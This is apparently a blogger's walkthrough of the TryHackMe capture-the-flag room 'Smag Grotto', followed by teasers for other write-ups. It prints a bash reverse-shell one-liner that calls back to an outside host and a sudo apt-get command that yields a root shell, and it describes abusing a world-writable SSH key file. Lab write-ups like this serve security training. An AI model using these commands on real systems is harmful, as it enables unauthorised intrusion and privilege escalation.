Smag Grotto

May 24, 2021•215 words

Smag Grotto - THM

After a basic scan (nothing too fancy needed here) you should see two open ports. Let's set aside SSH for now and check out the website. There seems to be very little, but a quick directory bust reveals a useful file you can download and analyze. These file gives you three powerful pieces of information:

Credentials
a subdomain where to use said credentials
the path where to login with those

Modify your /etc/hosts in order to reach the subdomain and log in the platform. This gives you the possibility to execute commands. My choice was the following:

bash -c "bash -i >& /dev/tcp/IP/PORT 0>&1"

Once you obtain your reverse shell in your preferred way, cronjobs are the way to go. There is a cronjob modifying the key allowed to log in as jake using SSH. The file hosting this key is world-writable, be sure to insert your public key in there to gain access as jake.

Grab your flag in jake's home and go for the usual check of your sudo privileges. You should then be on GTFOBins in less than two seconds. Using the following command will grant you a root shell, so you can retrieve the last flag and be done with the Smag Grotto:

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

👍❤️🫶👏👌🤯🤔😂😍😭😢😡😮

Subscribe to the author

You'll only receive email when they publish something new.

More from emacab98
All posts

magician

May 20, 2021•271 words

magician - THM After the initial scan, there appear to be two open ports on the target. One of them should suggest to try the oldie-but-goodie anonymous session, which can give you a pretty powerful hint. Follow it and then watch what you have to face on the other port. This service suffers from the ImageMagick vulnerability known as ImageTragick, which leads to RCE. In order to exploit it you can:Create your own payload (but why reinvent the wheel, right?);PayloadsAllTheThings has an entire ...

Read post

VulnNet: Node

May 25, 2021•303 words